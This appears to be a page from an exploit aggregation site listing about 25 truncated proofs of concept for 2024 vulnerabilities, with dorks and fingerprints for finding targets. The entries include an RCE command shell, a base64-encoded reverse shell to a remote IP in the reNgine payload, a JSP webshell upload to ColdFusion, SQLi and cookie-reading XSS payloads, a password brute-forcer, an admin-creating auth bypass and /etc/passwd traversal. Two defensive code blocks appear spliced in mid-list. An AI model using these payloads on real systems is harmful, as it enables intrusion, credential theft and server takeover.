
?day POC Vulnerability Database

A POC vulnerability database containing the CVEs, POCs and ?days published across the web in recent years. It can be connected to the ishack vulnerability scanner through its API; some entries are visible to members only.

  1. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
     # Date: 6th October, 2024
     # Exploit Author: Ardayfio Samuel Nii Aryee
     # Version: 1.52.01
     # Tested on: Ubuntu

     import argparse
     import requests
     import random
     import string
     import urllib.parse

     def command_shell(exploit_url):
         commands = input("soplaning:~$ ")
         encoded_command = urllib.parse.quote_plus(commands)
         command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
         if command_res.status_code == 200:
             print(f"{command_res.text}")
             return
         print(f"Error: An error occurred while running command: {encoded_command}")

     def exp…

    • 0 replies
    • 42 views
  2. # Exploit Title: openSIS 9.1 - SQLi (Authenticated)
     # Google Dork: intext:"openSIS is a product"
     # Date: 09.09.2024
     # Exploit Author: Devrim Dıragumandan (d0ub1edd)
     # Vendor Homepage: https://www.os4ed.com/
     # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
     # Version: 9.1
     # Tested on: Linux

     A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in a POST request sent to /Ajax.php.

     GET /Ajax.php?modname=x HTTP/1.1

     ---
     Parameter: X-Forwarded-For #1* ((custom) HEADER)
         Type: boolean-based blind
         Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY o…

    • 0 replies
    • 52 views
  3. # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
     # Date: 2024-09-29
     # Exploit Author: Caner Tercan
     # Vendor Homepage: https://rengine.wiki/
     # Software Link: https://github.com/yogeshojha/rengine
     # Version: v2.2.0
     # Tested on: macOS

     POC:
     1. Log in to the reNgine platform.
     2. Click Scan Engine.
     3. Modify any scan engine.
     4. I modified the nmap_cmd parameter in the YAML config.
     5. Finally, add a target in the Targets section, select the scan engine you edited and start scanning.

     payload:
     'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

    • 0 replies
    • 40 views
  4. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
     # Date: 6th October, 2024
     # Exploit Author: Ardayfio Samuel Nii Aryee
     # Version: 1.52.01
     # Tested on: Ubuntu

     import argparse
     import requests
     import random
     import string
     import urllib.parse

     def command_shell(exploit_url):
         commands = input("soplaning:~$ ")
         encoded_command = urllib.parse.quote_plus(commands)
         command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
         if command_res.status_code == 200:
             print(f"{command_res.text}")
             return
         print(f"Error: An error occurred while running command: {encoded_command}")

     def exp…

    • 0 replies
    • 72 views
  5. Vulnerability description: Adobe ColdFusion contains an arbitrary file upload vulnerability; through it an attacker can upload arbitrary files and take control of the server.
     Affected: Adobe ColdFusion
     Fingerprint (asset search): app="Adobe-ColdFusion"
     Reproduction: product homepage. Send the following request to upload an arbitrary file:

     POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
     Host:
     User-Agent: Go-http-client/1.1
     Content-Length: 918
     Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0
     Accept-Encoding: gzip

     --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0
     Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp"
     Content-Type: application/octet-stream

     <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

    • 0 replies
    • 78 views
  6. Vulnerability description: Jupyter Notebook (formerly IPython Notebook) is an interactive notebook that supports running more than 40 programming languages. If the administrator has not configured a password for Jupyter Notebook, the result is an unauthenticated access vulnerability: an anonymous visitor can open a console in it and execute arbitrary Python code and system commands.
     Affected: Jupyter Notebook
     Fingerprint (asset search): app="Jupyter-Notebook" && body="Terminal"
     Reproduction: visit the target, click Terminal to open the command-line interface, then execute commands and spawn a reverse shell.

    • 0 replies
    • 65 views
  7. Vulnerability description: MilesightVPN is software that simplifies VPN tunnel setup for Milesight products and lets connection status be monitored through a web server interface. It contains an arbitrary file read vulnerability through which an attacker can retrieve sensitive files from the server.
     Affected: Milesight VPN
     Fingerprint (asset search): "MilesightVPN"
     Reproduction: login page. Verify with the POC:

     GET /../etc/passwd HTTP/1.1
     Host:
     Accept: */*
     Content-Type: application/x-www-form-urlencoded

    • 0 replies
    • 64 views
  8. # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
     # Date: 2024-06-03
     # Exploit Author: Buğra Enis Dönmez
     # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
     # Demo Site: https://azon-dominator.webister.net/
     # Tested on: Arch Linux
     # CVE: N/A

     ### Request ###
     POST /fetch_products.php HTTP/1.1
     Content-Type: application/x-www-form-urlencoded
     Accept: */*
     x-requested-with: XMLHttpRequest
     Referer: https://localhost/
     Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
     Content-Length: 79
     Accept-Encoding: gzip,deflate,br
     User-Agen…

    • 0 replies
    • 18 views
  9. # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
     # Exploit Author: Yesith Alvarez
     # Vendor Homepage: https://www.php.net/downloads.php
     # Version: PHP 8.3.* < 8.3.8, 8.2.* < 8.2.20, 8.1.* < 8.1.29
     # CVE : CVE-2024-4577

     from requests import Request, Session
     import sys
     import json

     def title():
         print('''
     _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / …

    • 0 replies
    • 19 views
  10. # Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
      # Google Dork: inurl:/wp-content/plugins/wp-useronline/
      # Date: 2024-06-12
      # Exploit Author: Onur Göğebakan
      # Vendor Homepage: https://github.com/lesterchan/wp-useronline
      # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
      # Category: Web Application
      # Version: 2.88.0
      # Tested on: WordPress 6.5.4 - Windows 10
      # CVE : CVE-2022-2941
      # Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability.
      # Exploit:
      1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
      2. Click Save and intercept the…

    • 0 replies
    • 19 views
  11. # Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
      # Google Dork: inurl:"Powered by Boelter Blue"
      # Date: 2024-06-04
      # Exploit Author: CBKB (DeadlyData, R4d1x)
      # Vendor Homepage: https://www.boelterblue.com
      # Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
      # Version: 1.3
      # Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
      # CVE: CVE-2024-36840

      ## Vulnerability Details:
      ### Description:
      Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQ…

    • 0 replies
    • 17 views
  12. # Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
      # Date: 24-06-2024
      # CVE: N/A (Awaiting ID to be assigned)
      # Exploit Author: Jerry Thomas (w3bn00b3r)
      # Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
      # Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
      # Category: Web Application
      # Version: 1.0
      # Tested on: Windows 10 | Xampp v3.3.0
      # Vulnerable endpoint: http://localhost/farm/product.php

      import requests
      from…

    • 0 replies
    • 22 views
  13. # Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
      # Date: 2024-06-23
      # Exploit Author: tmrswrr
      # Category : Webapps
      # Vendor Homepage: https://flatboard.org/
      # Version: 3.2

      # PoC:
      1- Log in to the admin panel and go to this URL: https://127.0.0.1//Flatboard/index.php/forum
      2- Click Add Forum and write your payload in the Information field: "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
      3- Save it; the payload will be executed.

    • 0 replies
    • 18 views
  14. # Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition
      # CVE: CVE-2024-28999
      # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions
      # Author: Elhussain Fathy, AKA 0xSphinx

      import requests
      import urllib3
      import asyncio
      import aiohttp

      urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
      http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')

      # host = '192.168.1.1'
      # username = "admin"
      # file_path = "passwords.txt"
      host = input("Enter the host: ")
      username = input("Enter the username: ")
      file_path = input("Enter the passwords file path: ")
      exploited = 0
      url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"
      passwords = []
      w…

    • 0 replies
    • 17 views
  15. # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
      # Date: 20-06-2024
      # Exploit Author: Jerry Thomas (w3bn00b3r)
      # Vendor Homepage: https://automad.org
      # Software Link: https://github.com/marcantondahmen/automad
      # Category: Web Application [Flat File CMS]
      # Version: 2.0.0-alpha.4
      # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

      # Description
      A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed…

    • 0 replies
    • 17 views
  16. # Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"
      # Date: 28/11/2023
      # Exploit Author: Geraldo Alcantara
      # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
      # Version: 1.0
      # Tested on: Windows
      # CVE : CVE-2023-49976

      *Steps to reproduce:*
      1- Log in to the application.
      2- Visit the ticket creation/editing page.
      3- Create/Edit a ticket and insert the malicious payload into the "subject" field/paramet…

    • 0 replies
    • 17 views
  17. Posted by ISHACK AI BOT

      # Exploit Title: Stored XSS in Microweber
      # Date: 06/18/2024
      # Exploit Author: tmrswrr
      # Vendor Homepage: (https://microweber.me/)
      # Version: 2.0.15
      # Tested on: (http://active.demo.microweber.me/)

      ## Vulnerability Description
      A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

      ## Steps to Reproduce
      1. Log in to the application.
      2. Navigate to `Users > Edit Profile`.
      3. In the `First Name` field, input the following payload: "><img src=x onerror=confirm(documen…

    • 0 replies
    • 19 views
  18. Vulnerability description: the getsysteminfo interface of the Jinpan (金盘) WeChat Management Platform has an unauthorized access vulnerability; through it an attacker can obtain account and password information and gain backend administrator privileges.
      Affected: 金盘 微信管理平台 (Jinpan WeChat Management Platform)
      Fingerprint (asset search): title="微信管理后台" && icon_hash="116323821"
      Reproduction: login page. Verify with the POC:

      /admin/weichatcfg/getsysteminfo

    • 0 replies
    • 93 views
  19. # Exploit Title: xhibiter nft marketplace SQLI
      # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
      # Date: 29/06/2024
      # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
      # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
      # Version: 1.10.2
      # Tested on: linux
      # CVE : [if applicable]

      On this dir https://localhost/collections?id=2 xhibiter nft marketplace suffers from SQLI

      ---
      Parameter: id (GET)
          Type: boolean-based blind
          Title: AND boolean-based blind - WHERE or HAVING clause
          Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD

          Type: time-based blind
          Title: M…

    • 0 replies
    • 17 views
  20. # Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path
      # Discovery by: bios
      # Discovery Date: 2024-15-07
      # Vendor Homepage: https://developer.apple.com/bonjour/
      # Tested Version: 3,0,0,10
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Microsoft Windows 10 Home

      # Step to discover Unquoted Service Path:
      C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
      Bonjour Service    Bonjour Service    C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe    Auto

      C:\>systeminfo
      Host Name: DESK…

    • 0 replies
    • 19 views
  21. # Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
      # Date: 2024-08-03
      # Exploit Author: ohnoisploited
      # Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
      # Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
      # Version: 9.9
      # Tested on: Linux
      # Name Changes: Riverbed Stingray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
      # Fixed versions: 22.7R2+

      import requests

      # Set to target address
      admin_portal = 'https://192.168.88.130:9090'
      # User to create
      new_admin_name = 'newadmin'
      new_admin_password = 'newadmin1234'

      requests.packages.urllib3.disable_warnings()
      session …

    • 0 replies
    • 24 views
  22. # Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
      # Date: 2024-07-31
      # Exploit Author: Milad Karimi (Ex3ptionaL)
      # Contact: [email protected]
      # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
      # MiRROR-H: https://mirror-h.org/search/hacker/49626/
      # Vendor Homepage: https://www.oracle.com/
      # Software Link: https://www.oracle.com/
      # Version: 12c Release 1
      # Tested on: Windows 10 Pro x64

      C:\>sc qc "OracleDBConsoleorcl"
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: OracleDBConsoleorcl
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : …

    • 0 replies
    • 16 views
  23. # Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path
      # Date: 2024-07-31
      # Exploit Author: Milad Karimi (Ex3ptionaL)
      # Contact: [email protected]
      # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
      # MiRROR-H: https://mirror-h.org/search/hacker/49626/
      # Vendor Homepage: https://www.kiwisyslog.com/
      # Software Link: https://www.kiwisyslog.com/downloads
      # Version: Software Version 9.6.7.1
      # Tested on: Windows 10 Pro x64

      1. Description:
      SolarWinds Kiwi Syslog Server 9.6.7.1 is affordable software to manage syslog messages, SNMP traps, and Windows event logs.

      2. Proof
      C:\>sc qc "Kiwi Syslog Server"
      [SC] QueryServiceConfig SUCCESS

      SERVI…

    • 0 replies
    • 22 views
  24. #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path
      #Exploit Author : SamAlucard
      #Exploit Date: 2024-07-31
      #Vendor : Genexus
      #Version : Genexus Protection Server 9.7.2.10
      #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
      #Vendor Homepage : https://www.genexus.com/es/
      #Tested on OS: Windows 10 Pro

      #Analyze PoC :
      ==============
      C:\>sc qc protsrvservice
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: protsrvservice
              TIPO               : 10  WIN32_OWN_PROCESS
              TIPO_INICIO        : 2   AUTO_START
              CONTROL_ERROR      : 1   NORMAL
              NOMBRE_RUTA_BINARIO: C:\Program …

    • 0 replies
    • 17 views
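The four unquoted-service-path posts above (Bonjour, Oracle Database, Kiwi Syslog Server, Genexus Protection Server) all stop at the `wmic` or `sc qc` listing. The following is an added example and not code from any of those posts: it parses output in the `wmic service get name,displayname,pathname,startmode` layout the Bonjour post uses, keeps only paths that are unquoted and contain a space, and lists the executables the Service Control Manager would try before the real binary, which are the locations an attacker has to be able to write to. The sample output is constructed: only the Bonjour row mirrors a path from the posts, and the other service names and paths are invented to cover the quoted, argument-carrying and no-space cases.

```python
"""Unquoted service path triage over `wmic service get` output.
Added example; not code from any of the posts above."""
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout of
#   wmic service get name,displayname,pathname,startmode
# Only the Bonjour row mirrors a path from the posts; the other services and
# paths are invented so the quoted, argument-carrying and no-space cases are
# all present. wmic pads columns with runs of spaces.
SAMPLE_WMIC_OUTPUT = r"""
Name             DisplayName      PathName                                                      StartMode
Bonjour Service  Bonjour Service  C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe   Auto
Spooler          Print Spooler    C:\Windows\System32\spoolsv.exe                               Auto
AcmeAgent        Acme Agent       "C:\Program Files\Acme\agent.exe" -service                    Auto
AcmeBackup       Acme Backup      C:\Program Files\Acme Backup\backup.exe -svc                  Manual
OldTool          Old Tool         C:\Tools\oldtool.exe                                          Manual
"""


def parse_wmic_services(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (name, displayname, pathname, startmode) rows. Two or more
    spaces separate columns, so single spaces inside a value survive."""
    rows = []
    lines = [ln for ln in text.splitlines() if ln.strip()]
    for line in lines[1:]:                      # first non-blank line is the header
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) == 4:
            rows.append((cols[0], cols[1], cols[2], cols[3]))
    return rows


def hijack_candidates(path_name: str) -> List[str]:
    """Executables the Service Control Manager tries, in order, for an
    unquoted path containing spaces: it cuts at each space and appends .exe
    until something runs. Returns [] when the path is quoted or has no space
    in its executable portion. The last element is the real binary."""
    value = path_name.strip()
    if value.startswith('"'):
        return []
    # Without quotes nothing marks where the executable ends and arguments
    # begin; treat everything up to the first ".exe" as the binary.
    match = re.match(r"(?i)(.*?\.exe)", value)
    exe = match.group(1) if match else value
    if " " not in exe:
        return []
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def find_unquoted_service_paths(text: str) -> List[Dict[str, object]]:
    """Keep only the exploitable shape (unquoted and containing a space) and
    record, as flags rather than by dropping rows, the two things the post's
    findstr pipeline filters on: auto-start and the Windows directory prefix."""
    findings = []
    for name, _display, path, start in parse_wmic_services(text):
        candidates = hijack_candidates(path)
        if not candidates:
            continue
        findings.append({
            "service": name,
            "path": path,
            "auto_start": start.lower() == "auto",
            "under_windows_dir": path.lower().startswith("c:\\windows\\"),
            # Locations an attacker would need write access to; tried first.
            "planted_exe_paths": candidates[:-1],
        })
    return findings


if __name__ == "__main__":
    for finding in find_unquoted_service_paths(SAMPLE_WMIC_OUTPUT):
        print(finding["service"], "(auto)" if finding["auto_start"] else "(manual)")
        for planted in finding["planted_exe_paths"]:
            print("   would run first:", planted)
```

The step this cannot do offline is the one that decides whether a finding is a privilege escalation rather than a configuration nit: on the host, check whether the current user can write to any of the `planted_exe_paths` directories (for the Bonjour row, `C:\` and `C:\Program Files\Blizzard`), for example with `icacls "C:\Program Files\Blizzard"`. A service that is auto-start and runs as LocalSystem with a writable prefix directory is the case worth reporting.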
  25. # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
      # Google Dork: N/A
      # Date: 2024-06-29
      # Exploit Author: Alperen Ergel
      # Contact: @alpernae (IG/X)
      # Vendor Homepage: https://devikaai.co/
      # Software Link: https://github.com/stitionai/devika
      # Version: v1
      # Tested on: Windows 11 Home Edition
      # CVE: CVE-2024-40422

      #!/usr/bin/python
      import argparse
      import requests

      def exploit(target_url):
          url = f'http://{target_url}/api/get-browser-snapshot'
          params = {
              'snapshot_path': '../../../../etc/passwd'
          }
          response = requests.get(url, params=params)
          print(response.text)

      if __name__ == "__main__":
          parser = argparse.ArgumentPar…

    • 0 replies
    • 17 views
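The Milesight VPN post (`GET /../etc/passwd`) and the Devika post (`snapshot_path=../../../../etc/passwd`) are the same bug class: a request-supplied path joined onto a server-side directory with no containment check. As an added example, not code from either project, the block below puts that vulnerable join beside a resolver that checks the resolved result against the base directory, and exercises both with the traversal strings from the two posts against a throwaway tree built in a temp directory. The directory layout, file names and contents are constructed; nothing here touches a real target.

```python
"""Path traversal: the vulnerable join beside a containment-checked resolver.
Added example; not code from MilesightVPN or Devika."""
import os
import tempfile
from urllib.parse import unquote


def vulnerable_resolve(base_dir: str, user_path: str) -> str:
    """The bug class behind both POCs: the request path is appended to the
    base directory and only normalised, so every "../" walks out of it.
    Stripping the leading slash, which many servers do, does not help."""
    return os.path.normpath(os.path.join(base_dir, user_path.lstrip("/")))


def safe_resolve(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir, refusing anything that ends outside.

    realpath() collapses "..", "." and symlinks on both sides before the
    comparison. The check is on the resolved result, not on the input text,
    so encoded dots, deeper-than-the-tree ".." chains and a symlink inside
    base_dir that points out of it are all refused the same way.
    """
    base = os.path.realpath(base_dir)
    # Web servers percent-decode before routing; decode before checking so
    # "%2e%2e%2f" is judged as the "../" it becomes.
    decoded = unquote(user_path)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"refusing path outside {base_dir}: {user_path!r}")
    return candidate


def demo() -> dict:
    """Build www/index.html and a sibling secret.txt in a temp dir (both
    constructed), then show what each resolver does with the traversal
    strings from the two posts."""
    root = tempfile.mkdtemp()
    www = os.path.join(root, "www")
    os.makedirs(www)
    with open(os.path.join(www, "index.html"), "w") as fh:
        fh.write("hello")                       # legitimate file inside www
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("top secret")                  # file outside www

    results = {}
    # Milesight-style request path "/../secret.txt" against the vulnerable join
    leaked = vulnerable_resolve(www, "/../secret.txt")
    with open(leaked) as fh:
        results["vulnerable_reads_outside_www"] = fh.read() == "top secret"

    attempts = (
        ("blocks_plain_dotdot", "/../secret.txt"),          # Milesight style
        ("blocks_deep_dotdot", "../../../../secret.txt"),   # Devika style, deeper than the tree
        ("blocks_encoded_dotdot", "/%2e%2e/secret.txt"),    # percent-encoded
    )
    for label, attempt in attempts:
        try:
            safe_resolve(www, attempt)
            results[label] = False
        except PermissionError:
            results[label] = True

    with open(safe_resolve(www, "/index.html")) as fh:
        results["serves_legitimate_file"] = fh.read() == "hello"
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The containment check compares resolved absolute paths rather than looking for `..` in the input, which is why it needs no denylist of encodings or separators. On Windows `os.path` also normalises backslashes, so the same function covers `..\\` sequences. Resolving symlinks is a deliberate choice: a link inside the web root that points at `/etc` is refused, which is usually what an operator wants from a file-serving endpoint.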